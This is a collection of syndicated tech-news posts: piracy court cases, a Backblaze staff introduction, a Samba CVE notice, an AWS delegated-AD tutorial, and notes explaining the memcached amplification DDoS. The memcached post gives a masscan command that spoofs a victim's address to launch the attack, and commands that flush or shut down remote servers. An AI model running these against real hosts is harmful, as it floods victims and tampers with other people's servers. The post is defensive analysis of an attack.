Founder of Fan-Made Subtitle Site Loses Copyright Infringement Appeal

Post Syndicated from Andy original https://torrentfreak.com/founder-of-fan-made-subtitle-site-lose-copyright-infringement-appeal-180318/

For millions of people around the world, subtitles are the only way to enjoy media in languages other than that in the original production. For the deaf and hard of hearing, they are absolutely essential.

Movie and TV show companies tend to be quite good at providing subtitles eventually but, in line with other restrictive practices associated with their industry, it can often mean a long wait for the consumer, particularly in overseas territories.

For this reason, fan-made subtitles have become somewhat of a cottage industry in recent years. Where companies fail to provide subtitles quickly enough, fans step in and create them by hand. This has led to the rise of a number of subtitling platforms, including the now widely recognized Undertexter.se in Sweden.

The platform had its roots back in 2003 but first hit the headlines in 2013 when Swedish police caused an uproar by raiding the site and seizing its servers.

“The people who work on the site don’t consider their own interpretation of dialog to be something illegal, especially when we’re handing out these interpretations for free,” site founder Eugen Archy said at the time.

Vowing to never give up in the face of pressure from the authorities, anti-piracy outfit Rättighetsalliansen (Rights Alliance), and companies including Nordisk Film, Paramount, Universal, Sony and Warner, Archy said that the battle over what began as a high school project would continue.

“No Hollywood, you played the wrong card here. We will never give up, we live in a free country and Swedish people have every right to publish their own interpretations of a movie or TV show,” he said.

It took four more years but in 2017 the Undertexter founder was prosecuted for distributing copyright-infringing subtitles while facing a potential prison sentence.

Things didn’t go well and last September the Attunda District Court found him guilty and sentenced the then 32-year-old operator to probation. In addition, he was told to pay 217,000 Swedish krona ($26,400) to be taken from advertising and donation revenues collected through the site.

Eugen Archy took the case to appeal, arguing that the Svea Hovrätt (Svea Court of Appeal) should acquit him of all the charges and dismiss or at least reduce the amount he was ordered to pay by the lower court. Needless to say, this was challenged by the prosecution.

On appeal, Archy agreed that he was the person behind Undertexter but disputed that the subtitle files uploaded to his site infringed on the plaintiffs’ copyrights, arguing they were creative works in their own right.

While to an extent that may have been the case, the Court found that the translations themselves depended on the rights connected to the original work, which were entirely held by the relevant copyright holders. While paraphrasing and parody might be allowed, pure translations are completely covered by the rights in the original and cannot be seen as new and independent works, the Court found.

The Svea Hovrätt also found that Archy acted intentionally, noting that in addition to administering the site and doing some translating work himself, it was “inconceivable” that he did not know that the subtitles made available related to copyrighted dialog found in movies.

In conclusion, the Court of Appeal upheld Archy’s copyright infringement conviction (pdf, Swedish) and sentenced him to probation, as previously determined by the Attunda District Court.

Last year, the legal status of user-created subtitles was also tested in the Netherlands. In response to local anti-piracy outfit BREIN forcing several subtitling groups into retreat, a group of fansubbers decided to fight back.

After raising their own funds, in 2016 the “Free Subtitles Foundation” (Stichting Laat Ondertitels Vrij – SLOV) took the decision to sue BREIN with the hope of obtaining a favorable legal ruling.

In 2017 it all fell apart when the Amsterdam District Court handed down its decision and sided with BREIN on each count.

The Court found that subtitles can only be created and distributed after permission has been obtained from copyright holders. Doing so outside these parameters amounts to copyright infringement.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Welcome Michele – Our HR Coordinator

Post Syndicated from Yev original https://www.backblaze.com/blog/welcome-michele-our-hr-coordinator/

Backblaze is growing rapidly and as we have more and more job listings coming online and more employees to corral, we needed another member on our Human Resources team! Enter Michele, who is joining the HR folks to help recruit, onboard, and expand our HR organization. Let’s learn a bit more about Michele, shall we?

What is your Backblaze Title?
HR Coordinator.

Where are you originally from?
I was born and raised in the East Bay.

What attracted you to Backblaze?
The opportunity to learn new skills, as most of my experience is in office administration… I’m excited to jump into the HR world!

What do you expect to learn while being at Backblaze?
So much! All of the ins and outs of HR, the hiring and onboarding processes, and everything in between…so excited!

Where else have you worked?
I’ve previously worked at Clars Auction Gallery where I was Consignor Relations for 6 years, and most recently at Stellar Academy for Dyslexics where I was the Office Administrator/Bookkeeper.

Where did you go to school?
San Francisco Institute of Esthetics and Cosmetology.

What’s your dream job?
Pastry Chef!

Favorite place you’ve traveled?
Maui. I could lay on the beach and bob in the water all day, every day! But also, Disney World…who doesn’t love a good Disney vacation?

Favorite hobby?
Baking, traveling, reading, exploring new restaurants, SF Giants games

Star Trek or Star Wars?
Star Wars.

Coke or Pepsi?
Black iced tea?

Favorite food?
Pretty much everything…street tacos, ramen, sushi, Thai, pho.

Why do you like certain things?
Because why not?

Anything else you’d like to tell us?
I love Disney!

Another person who loves Disney! Welcome to the team Michele, we’ll have lots of tea ready for you!

The post Welcome Michele – Our HR Coordinator appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Tamilrockers Arrests: Police Parade Alleged Movie Pirates on TV

Post Syndicated from Andy original https://torrentfreak.com/tamilrockers-arrests-police-parade-alleged-movie-pirates-on-tv-180315/

Just two years ago around 277 million people used the Internet in India. Today there are estimates as high as 355 million and with a population of more than 1.3 billion, India has plenty of growth yet to come.

Also evident is that in addition to a thirst for hard work, many Internet-enabled Indians have developed a taste for Internet piracy. While the US and Europe were the most likely bases for pirate site operators between 2000 and 2015, India now appears in a growing number of cases, from torrent and streaming platforms to movie release groups.

One site that is clearly Indian-focused is the ever-popular Tamilrockers. The site has laughed in the face of the authorities for a number of years, skipping from domain to domain as efforts to block the site descend into a chaotic game of whack-a-mole. Like The Pirate Bay, Tamilrockers has burned through plenty of domains including tamilrockers.in, tamilrockers.ac, tamilrockers.me, tamilrockers.co, tamilrockers.is, tamilrockers.us and tamilrockers.ro.

Now, however, the authorities are claiming a significant victory against the so-far elusive operators of the site. The anti-piracy cell of the Kerala police announced last evening that they’ve arrested five men said to be behind both Tamilrockers and alleged sister site, DVDRockers.

They’re named as alleged Tamilrockers owner ‘Prabhu’, plus ‘Karthi’ and ‘Suresh’ (all aged 24), plus alleged DVD Rockers owner ‘Johnson’ and ‘Jagan’ (elsewhere reported as ‘Maria John’). The men were said to be generating between US$1,500 and US$3,000 each per month. The average salary in India is around $600 per annum.

While details of how the suspects were caught tend to come later in US and European cases, the Indian authorities are more forthright. According to Anti-Piracy Cell Superintendent B.K. Prasanthan, who headed the team that apprehended the men, it was a trail of advertising revenue crumbs that led them to the suspects.

Prasanthan revealed that it was an email, sent by a Haryana-based ad company to an individual who was arrested in 2016 in a similar case, that helped in tracking the members of Tamilrockers.

“This ad company had sent a mail to [the individual], offering to publish ads on the website he was running. In that email, the company happened to mention that they have ties with Tamilrockers. We got the information about Tamilrockers through this ad company,” Prasanthan said.

That information included the bank account details of the suspects.

Given the technical nature of the sites, it’s perhaps no surprise that the suspects are qualified in the IT field. Prasanthan revealed that all of them had done well academically.

“All the gang members were technically qualified. It even included MSc and BSc holders in computer science. They used to record movies in pieces from various parts of the world and join [them together]. We are trying to trace more members of the gang including Karthi’s brothers,” Prasanthan said.

All five men were remanded in custody but not before they were paraded in front of the media, footage which later appeared on TV.

An important Samba 4 security release

Post Syndicated from corbet original https://lwn.net/Articles/749192/rss

Anybody running Samba 4 servers probably wants to take a look at this and upgrade their systems. “CVE-2018-1057: On a Samba 4 AD DC the LDAP server in all versions of Samba from 4.0.0 onwards incorrectly validates permissions to modify passwords over LDAP allowing authenticated users to change any other users’ passwords, including administrative users.”
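As a quick triage aid, the advisory's branch cut-offs can be encoded in a few lines. This is only a sketch: the fixed point releases 4.5.16, 4.6.14 and 4.7.6 are my reading of the advisory and should be verified against the official Samba security page before relying on them.

```python
# Triage sketch for CVE-2018-1057 (Samba AD DC password-change bug).
# Assumption to verify: fixed releases were 4.5.16, 4.6.14 and 4.7.6;
# 4.x branches older than 4.5 were end-of-life and never patched.
FIXED_PATCH = {(4, 5): 16, (4, 6): 14, (4, 7): 6}

def vulnerable(version: str) -> bool:
    """Return True if this Samba version predates the fix on its branch."""
    major, minor, patch = (int(p) for p in version.split(".")[:3])
    if major != 4:
        return False  # the advisory covers Samba 4.0.0 onwards
    fix = FIXED_PATCH.get((major, minor))
    if fix is None:
        return minor < 5  # EOL 4.0-4.4 branches: affected, no fix issued
    return patch < fix
```

Note that this only flags the version; the bug is exploitable only when Samba runs as an AD DC, not as a plain file server.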

Pirate Site Admins Receive Suspended Sentences, Still Face €60m Damages Claim

Post Syndicated from Andy original https://torrentfreak.com/pirate-site-admins-receive-suspended-sentences-still-face-e60m-damages-claim-180313/

After being founded in 2009, French site Liberty Land (LL) made its home in Canada. At the time listed among France’s top 200 sites, Liberty Land carried an estimated 30,000 links to a broad range of unlicensed content.

Like many other indexes of its type, LL carried no content itself but hosted links to content hosted elsewhere, on sites like Megaupload and Rapidshare, for example. This didn’t save the operation from an investigation carried out by rightsholder groups SACEM and ALPA, which filed a complaint against Liberty Land with the French authorities in 2010.

Liberty Land

In May 2011 and alongside complaints from police that the people behind Liberty Land had taken extreme measures to hide themselves away, authorities arrested several men linked to the site in Marseille, near Le Havre, and in the Paris suburb of Montreuil.

Despite the men facing a possible five years in jail and fines of up to $700,000, the inquiry dragged on for nearly seven years. The trial of the site’s alleged operators, now aged between 29 and 36, finally went ahead January 30 in Rennes.

The men faced charges that they unlawfully helped to distribute movies, TV series, games, software, music albums and e-books without permission from rightsholders. In court, one defended the site as being just like Google.

“For me, we had the same role as Google,” he said. “We were an SEO site. There is a difference between what we were doing and the distribution of pirated copies on the street.”

According to the prosecution, the site made considerable revenues from advertising, estimated at more than 300,000 euros between January 2009 and May 2011. The site’s two main administrators reportedly established an offshore company in the British Virgin Islands and a bank account in Latvia where they deposited between 100,000 and 150,000 euros each.

The prosecutor demanded fines for the former site admins and sentences of between six and 12 months in prison. Last week the Rennes Criminal Court rendered its decision, sentencing the four men to suspended sentences of between two and three months. More than 176,000 euros generated by the site was also confiscated by the Court.

While the men will no doubt be relieved that this extremely long case has reached a conclusion of sorts, it’s not over yet. 20minutes reports that the claims for damages filed by copyright groups including SACEM won’t be decided until September and they are significant, totaling 60 million euros.

U.S. Navy Under Fire in Mass Software Piracy Lawsuit

Post Syndicated from Ernesto original https://torrentfreak.com/u-s-navy-under-fire-in-mass-software-piracy-lawsuit-180312/

In 2011 and 2012, the US Navy began using BS Contact Geo, a 3D virtual reality application developed by German company Bitmanagement.

The Navy reportedly agreed to purchase licenses for use on 38 computers, but things began to escalate.

While Bitmanagement was hopeful that it could sell additional licenses to the Navy, the software vendor soon discovered the US Government had already installed it on 100,000 computers without extra compensation.

In a Federal Claims Court complaint filed by Bitmanagement two years ago, that figure later increased to hundreds of thousands of computers. Because of the alleged infringement, Bitmanagement demanded damages totaling hundreds of millions of dollars.

In the months that followed both parties conducted discovery and a few days ago the software company filed a motion for partial summary judgment, asking the court to rule that the US Government is liable for copyright infringement.

According to the software company, it’s clear that the US Government crossed a line.

“The Navy admits that it began installing the software onto hundreds of thousands of machines in the summer of 2013, and that it ultimately installed the software onto at least 429,604 computers. When it learned of this mass installation, Bitmanagement was surprised, but confident that it would be compensated for the numerous copies the Government had made,” the motion reads.

“Over time, however, it became clear that the Navy had no intention to pay Bitmanagement for the software it had copied without authorization, as it declined to execute any license on a scale commensurate with what it took,” Bitmanagement adds.

In its defense, the US Government had argued that it bought concurrent-use licenses, which permitted the software to be installed across the Navy network. However, Bitmanagement argues that it is impossible as the reseller that sold the software was only authorized to sell PC licenses.

In addition, the software company points out that the word “concurrent” doesn’t appear in the contracts, nor was there any mention of mass installations.

The Government also argued that Bitmanagement impliedly authorized it to install the software on hundreds of thousands of computers. This defense also makes little sense, the software company counters.

The Navy licensed an earlier version of the software for $30,000, which could be used on 100 computers, so it would seem odd that it could use the later version on hundreds of thousands of computers for only $5,490, the company argues.

“To establish that it had an implied license, the Government must show that Bitmanagement — despite having licensed a less advanced copy of its software to the Government in 2008 on a PC basis that allowed for installation on a total of 100 computers in exchange for $30,000 — later authorized the Government to make an unlimited number of installations of its advanced software product for $5,490.”
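The per-computer arithmetic behind that argument can be made explicit. This is a back-of-the-envelope illustration using only the figures quoted above, not numbers from the filing itself:

```python
# Per-computer cost under the 2008 PC-based license vs. the Navy's
# implied-license theory, using the figures quoted in the motion.
per_seat_2008 = 30_000 / 100          # $300 per computer
per_seat_implied = 5_490 / 429_604    # well under two cents per computer

print(f"2008 license: ${per_seat_2008:.2f}/computer")
print(f"Implied-license theory: ${per_seat_implied:.4f}/computer")
```

On those numbers, the implied-license theory prices each installation at roughly one twenty-thousandth of what the Government paid per computer in 2008, which is the implausibility Bitmanagement is pointing at.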

The full motion brings up a wide range of other arguments as well which, according to Bitmanagement, make it clear that the US Government is liable for copyright infringement. It, therefore, asks the court for a partial summary judgment.

“Bitmanagement respectfully requests that this Court grant summary judgment as to the Government’s liability for copyright infringement and hold that the Government copied BS Contact Geo beyond the limits of its license, on a scale equal to the hundreds of thousands of unauthorized copies of BS Contact Geo that the Government either installed or made available for installation,” the company concludes.

If the Government is indeed liable the scale of the damages will be decided at a later stage. The software company previously noted that this could be as high as $600 million.

This is not the first time that the U.S. military has been ‘caught’ pirating software. A few years ago it was accused of operating unlicensed logistics software, a case the Obama administration eventually settled for $50 million.

A copy of the motion for partial summary judgment is available here (pdf).

ISP Wants EU Court Ruling on Identifying ‘Pirating’ Subscribers

Post Syndicated from Ernesto original https://torrentfreak.com/isp-wants-eu-court-ruling-on-identifying-pirating-subscribers-180308/

In recent years Internet provider Bahnhof has fought hard to protect the privacy of its subscribers.

The company has been a major opponent of extensive data retention requirements, has launched a free VPN to its users, and vowed to protect subscribers from a looming copyright troll invasion.

The privacy-oriented ISP is doing everything in its power to prevent its Swedish customers from being exposed. It has even refused to hand over customer details in piracy cases when these requests are made by the police.

This stance resulted in a lawsuit in which Bahnhof argued that piracy isn’t a serious enough offense to warrant invading the privacy of its customers. The ISP said that this is in line with European privacy regulations.

Last month, the Administrative Court in Stockholm disagreed with this argument, ordering the ISP to hand over the requested information.

The Court ruled that disclosure of subscriber data to law enforcement agencies does not contravene EU law. It, therefore, ordered the ISP to comply, as the Swedish Post and Telecom Authority (PTS) had previously recommended.

While the order is a serious setback for Bahnhof, the ISP isn’t letting the case go just yet. It has filed an appeal where it maintains that disclosing details of alleged pirates goes against EU regulations.

Bahnhof says NO

To settle the matter once and for all, Bahnhof has asked the Swedish Appeals Court to refer the case to the EU Court of Justice, to have an EU ruling on the data disclosure issue.

“Bahnhof, therefore, requires the Court of Appeal to obtain a preliminary ruling from EU law so that the European Court of Justice itself can rule on the matter before the Court of First Instance reaches a final position,” Bahnhof writes.

Law enforcement requests for piracy-related data are quite common in Sweden. Bahnhof previously showed that more than a quarter of all police requests for subscriber data were for cases related to online file-sharing, trumping crimes such as grooming minors, forgery and fraud.

The ISP is vowing to fight this case to the bitter end. While it has no problem with law enforcement efforts in general, the company doesn’t want to hand over customer data without proper judicial review of a suspected crime.

“This legal process has already been going on for two years and Bahnhof is ready to continue for as long as necessary to achieve justice. Bahnhof will never agree to hand over delicate sensitive customer data without judicial review,” the company concludes.

How to Delegate Administration of Your AWS Managed Microsoft AD Directory to Your On-Premises Active Directory Users

Post Syndicated from Vijay Sharma original https://aws.amazon.com/blogs/security/how-to-delegate-administration-of-your-aws-managed-microsoft-ad-directory-to-your-on-premises-active-directory-users/

You can now enable your on-premises users to administer your AWS Directory Service for Microsoft Active Directory, also known as AWS Managed Microsoft AD. Using an Active Directory (AD) trust and the new AWS delegated AD security groups, you can grant administrative permissions to your on-premises users by managing group membership in your on-premises AD directory. This simplifies how you manage who can perform administration. It also makes it easier for your administrators because they can sign in to their existing workstation with their on-premises AD credential to administer your AWS Managed Microsoft AD.

AWS created new domain local AD security groups (AWS delegated groups) in your AWS Managed Microsoft AD directory. Each AWS delegated group has unique AD administrative permissions. Users that are members of the new AWS delegated groups get permissions to perform administrative tasks, such as adding users, configuring fine-grained password policies, and enabling Microsoft enterprise Certificate Authority. Because the AWS delegated groups are domain local in scope, you can use them through an AD trust to your on-premises AD. This eliminates the requirement to create and use separate identities to administer your AWS Managed Microsoft AD. Instead, by adding selected on-premises users to desired AWS delegated groups, you can grant your administrators some or all of the permissions. You can simplify this even further by adding on-premises AD security groups to the AWS delegated groups. This enables you to add and remove users from your on-premises AD security group so that they can manage administrative permissions in your AWS Managed Microsoft AD.

In this blog post, I will show you how to delegate permissions to your on-premises users to perform an administrative task–configuring fine-grained password policies–in your AWS Managed Microsoft AD directory. You can follow the steps in this post to delegate other administrative permissions, such as configuring group Managed Service Accounts and Kerberos constrained delegation, to your on-premises users.


Until now, AWS Managed Microsoft AD delegated administrative permissions for your directory by creating AD security groups in your Organizational Unit (OU) and authorizing these AWS delegated groups for common administrative activities. The admin user in your directory created user accounts within your OU, and granted these users permissions to administer your directory by adding them to one or more of these AWS delegated groups.

However, if you used your AWS Managed Microsoft AD with a trust to an on-premises AD forest, you couldn’t add users from your on-premises directory to these AWS delegated groups. This is because AWS created the AWS delegated groups with global scope, which restricts adding users from another forest. This necessitated that you create different user accounts in AWS Managed Microsoft AD for the purpose of administration. As a result, AD administrators typically had to remember additional credentials for AWS Managed Microsoft AD.

To address this, AWS created new AWS delegated groups with domain local scope in a separate OU called AWS Delegated Groups. These new AWS delegated groups with domain local scope are more flexible and permit adding users and groups from other domains and forests. This allows your admin user to delegate administrative permissions for your AWS Managed Microsoft AD directory to your on-premises users and groups.

Note: If you already have an existing AWS Managed Microsoft AD directory containing the original AWS delegated groups with global scope, AWS preserved the original AWS delegated groups in the event you are currently using them with identities in AWS Managed Microsoft AD. AWS recommends that you transition to use the new AWS delegated groups with domain local scope. All newly created AWS Managed Microsoft AD directories have the new AWS delegated groups with domain local scope only.

Now, I will show you the steps to delegate administrative permissions to your on-premises users and groups to configure fine-grained password policies in your AWS Managed Microsoft AD directory.


For this post, I assume you are familiar with AD security groups and how security group scope rules work. I also assume you are familiar with AD trusts.

The instructions in this blog post require you to have the following components running:

Solution overview

I will now show you how to manage which on-premises users have delegated permissions to administer your directory by efficiently using on-premises AD security groups to manage these permissions. I will do this by:

  1. Adding on-premises groups to an AWS delegated group. In this step, you sign in to a management instance connected to your AWS Managed Microsoft AD directory as the admin user and add on-premises groups to AWS delegated groups.
  2. Administering your AWS Managed Microsoft AD directory as an on-premises user. In this step, you sign in to a workstation connected to your on-premises AD using your on-premises credentials and administer your AWS Managed Microsoft AD directory.

For the purpose of this blog, I already have an on-premises AD directory (in this case, on-premises.com). I also created an AWS Managed Microsoft AD directory (in this case, corp.example.com) that I use with Amazon RDS for SQL Server. To enable Integrated Windows Authentication to my on-premises.com domain, I established a one-way outgoing trust from my AWS Managed Microsoft AD directory to my on-premises AD directory. To administer my AWS Managed Microsoft AD, I created an Amazon EC2 for Windows Server instance (in this case, Cloud Management). I also have an on-premises workstation (in this case, On-premises Management), that is connected to my on-premises AD directory.

The following diagram represents the relationships between the on-premises AD and the AWS Managed Microsoft AD directory.

The left side represents the AWS Cloud containing AWS Managed Microsoft AD directory. I connected the directory to the on-premises AD directory via a 1-way forest trust relationship. When AWS created my AWS Managed Microsoft AD directory, AWS created a group called AWS Delegated Fine Grained Password Policy Administrators that has permissions to configure fine-grained password policies in AWS Managed Microsoft AD.

The right side of the diagram represents the on-premises AD directory. I created a global AD security group called On-premises fine grained password policy admins and I configured it so all members can manage fine grained password policies in my on-premises AD. I have two administrators in my company, John and Richard, who I added as members of On-premises fine grained password policy admins. I want to enable John and Richard to also manage fine grained password policies in my AWS Managed Microsoft AD.

While I could add John and Richard to the AWS Delegated Fine Grained Password Policy Administrators individually, I want a more efficient way to delegate and remove permissions for on-premises users to manage fine grained password policies in my AWS Managed Microsoft AD. In fact, I want to assign permissions to the same people that manage password policies in my on-premises directory.

Diagram showing delegation of administrative permissions to on-premises users

To do this, I will:

  1. As admin user, add the On-premises fine grained password policy admins as member of the AWS Delegated Fine Grained Password Policy Administrators security group from my Cloud Management machine.
  2. Manage who can administer password policies in my AWS Managed Microsoft AD directory by adding and removing users as members of the On-premises fine grained password policy admins. Doing so enables me to perform all my delegation work in my on-premises directory without the need to use a remote desktop protocol (RDP) session to my Cloud Management instance. In this case, Richard, who is a member of On-premises fine grained password policy admins group can now administer AWS Managed Microsoft AD directory from On-premises Management workstation.

Although I’m showing a specific case using fine grained password policy delegation, you can do this with any of the new AWS delegated groups and your on-premises groups and users.

Let’s get started.

Step 1 – Add on-premises groups to AWS delegated groups

In this step, open an RDP session to the Cloud Management instance and sign in as the admin user in your AWS Managed Microsoft AD directory. Then, add your users and groups from your on-premises AD to AWS delegated groups in AWS Managed Microsoft AD directory. In this example, I do the following:

  1. Sign in to the Cloud Management instance with the user name admin and the password that you set for the admin user when you created your directory.
  2. Open the Microsoft Windows Server Manager and navigate to Tools > Active Directory Users and Computers.
  3. Switch to the tree view and navigate to corp.example.com > AWS Delegated Groups. Right-click AWS Delegated Fine Grained Password Policy Administrators and select Properties.
  4. In the AWS Delegated Fine Grained Password Policy window, switch to Members tab and choose Add.
  5. In the Select Users, Contacts, Computers, Service Accounts, or Groups window, choose Locations.
  6. In the Locations window, select on-premises.com domain and choose OK.
  7. In the Enter the object names to select box, enter on-premises fine grained password policy admins and choose Check Names.
  8. Because I have a 1-way trust from AWS Managed Microsoft AD to my on-premises AD, Windows prompts me to enter credentials for an on-premises user account that has permissions to complete the search. If I had a 2-way trust and the admin account in my AWS Managed Microsoft AD had permissions to read my on-premises directory, Windows would not prompt me. In the Windows Security window, enter the credentials for an account with permissions for on-premises.com and choose OK.
  9. Click OK to add On-premises fine grained password policy admins group as a member of the AWS Delegated Fine Grained Password Policy Administrators group in your AWS Managed Microsoft AD directory.

At this point, any user that is a member of On-premises fine grained password policy admins group has permissions to manage password policies in your AWS Managed Microsoft AD directory.
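The same membership change can also be made programmatically over LDAP instead of through the Active Directory Users and Computers GUI. The sketch below mirrors the example names from this post, but the exact OU/CN paths, host, and credentials are illustrative assumptions you would adapt to your own directory:

```python
# Hypothetical sketch: add the on-premises group to the AWS delegated
# group by appending its DN to the group's 'member' attribute over LDAP.
MODIFY_ADD = "MODIFY_ADD"  # stands in for ldap3.MODIFY_ADD so this sketch is self-contained

GROUP_DN = ("CN=AWS Delegated Fine Grained Password Policy Administrators,"
            "OU=AWS Delegated Groups,DC=corp,DC=example,DC=com")
MEMBER_DN = ("CN=On-premises fine grained password policy admins,"
             "CN=Users,DC=on-premises,DC=com")

def member_add_changes(member_dn):
    """Build the modify payload that appends member_dn to a group's
    'member' attribute."""
    return {"member": [(MODIFY_ADD, [member_dn])]}

# With the ldap3 library installed, the actual call would look like:
#   from ldap3 import Server, Connection, MODIFY_ADD
#   conn = Connection(Server("corp.example.com"), user="CORP\\admin",
#                     password="...", auto_bind=True)
#   conn.modify(GROUP_DN, member_add_changes(MEMBER_DN))
```

As with the GUI steps, the bind account needs permission to modify the delegated group, and a 1-way trust means the search for the on-premises DN requires on-premises credentials.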

Step 2 – Administer your AWS Managed Microsoft AD as on-premises user

Any member of the on-premises group(s) that you added to an AWS delegated group inherits the permissions of that AWS delegated group.

In this example, Richard signs in to the On-premises Management instance. Because Richard inherited permissions from the AWS Delegated Fine Grained Password Policy Administrators group, he can now administer fine grained password policies in the AWS Managed Microsoft AD directory using his on-premises credentials.

  1. Sign in to the On-premises Management instance as Richard.
  2. Open the Microsoft Windows Server Manager and navigate to Tools > Active Directory Users and Computers.
  3. Switch to the tree view, right-click Active Directory Users and Computers, and then select Change Domain.
  4. In the Change Domain window, enter corp.example.com, and then choose OK.
  5. You’ll be connected to your AWS Managed Microsoft AD domain.

Richard can now administer the password policies. Because John is also a member of the AWS delegated group, John can also perform password policy administration the same way.
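As an illustrative sketch (not taken from the original post), an administrator like Richard could also manage fine-grained password policies from PowerShell with the Active Directory module. The policy name, settings, and target group below are hypothetical examples:

```powershell
# Requires the RSAT Active Directory PowerShell module on the management instance.
# Policy name, settings, and group below are hypothetical examples.
New-ADFineGrainedPasswordPolicy -Name "ServiceAccountsPSO" `
    -Precedence 10 `
    -MinPasswordLength 16 `
    -LockoutThreshold 5 `
    -ComplexityEnabled $true

# Apply the new policy to a group in the corp.example.com domain.
Add-ADFineGrainedPasswordPolicySubject -Identity "ServiceAccountsPSO" `
    -Subjects "ServiceAccounts"
```

Because the permissions come from group membership, the same cmdlets work for any member of the delegated group.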

In the future, if Richard moves to another division within the company and you hire Judy as a replacement, you can simply remove Richard from the On-premises fine grained password policy admins group and add Judy to it. Richard will no longer have administrative permissions, while Judy can now administer password policies for your AWS Managed Microsoft AD directory.


We’ve tried to make it easier for you to administer your AWS Managed Microsoft AD directory by creating AWS delegated groups with domain local scope. You can add your on-premises AD groups to the AWS delegated groups. You can then control who can administer your directory by managing group membership in your on-premises AD directory. Your administrators can sign in to their existing on-premises workstations using their on-premises credentials and administer your AWS Managed Microsoft AD directory. I encourage you to explore the new AWS delegated security groups by using Active Directory Users and Computers from the management instance for your AWS Managed Microsoft AD. To learn more about AWS Directory Service, see the AWS Directory Service home page. If you have questions, please post them on the Directory Service forum. If you have comments about this post, submit them in the “Comments” section below.


Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan 0.0.0.0/0 -pU:11211 --banners | grep memcached
This example scans the entire Internet (/0). Replace 0.0.0.0/0 with your address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on [memcached] uptime=42083736 time=1520485365 version=1.4.13
The "banners" check filters out those with valid memcached responses, so you don't get other stuff that isn't memcached. To filter this output further, use 'cut' to grab just column 6:
… | cut -d ' ' -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot of results back that respond to TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these servers from the Internet.

Masscan as exploit script

BTW, you can use masscan not only to find amplifiers but also to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the spoofed source address, which is the target.
masscan -iL amplifiers.txt -pU:11211 --spoof-ip --rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached is supposed to listen on the localhost address (127.0.0.1) for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this configuration is often buggy, and servers end up listening either on 0.0.0.0 (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, such as when trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on 127.0.0.1 end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attack is to send the “stats” command. This is a 15-byte UDP packet that causes the server to send back a large response full of useful statistics about the server. You often see around 10 kilobytes of response across several packets.
A harder, but more effective, attack uses a two-step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve it. You can easily put 100 megabytes of data into the server this way, causing a retrieval with a single “get” command.
That’s why this has been the largest amplification attack ever: a single 100-byte packet can in theory cause a 100-megabyte response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.
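The two payloads discussed here are easy to construct by hand. A minimal Python sketch (my illustration, not from the original post) that builds the 15-byte "stats" probe and the "flush_all" kill-switch payload:

```python
import struct

# memcached's UDP frame header is four 16-bit big-endian fields:
# request id, sequence number, total datagrams, reserved.
def udp_frame(body: bytes, request_id: int = 0) -> bytes:
    return struct.pack("!HHHH", request_id, 0, 1, 0) + body

stats_probe = udp_frame(b"stats\r\n")      # the 15-byte amplification probe
flush_probe = udp_frame(b"flush_all\r\n")  # the cache-clearing "kill switch"

# Rough amplification math from the text: ~10 KB of stats output
# for a 15-byte request is roughly a 667x amplification.
amplification = 10_000 / len(stats_probe)
```

The 8-byte header here is exactly the `\x00\x00\x00\x00\x00\x01\x00\x00` prefix used in the echo/nc command later in this post.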

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning the amplifiers that are flooding you. The way to do this is to grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump:
tcpdump -i -w attackers.pcap src port 11211
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n" | nc -q1 -u 11211
Capture this packet using tcpdump or something, and save into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you, go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:11211 --pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shut down the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here is some good reading on this attack:

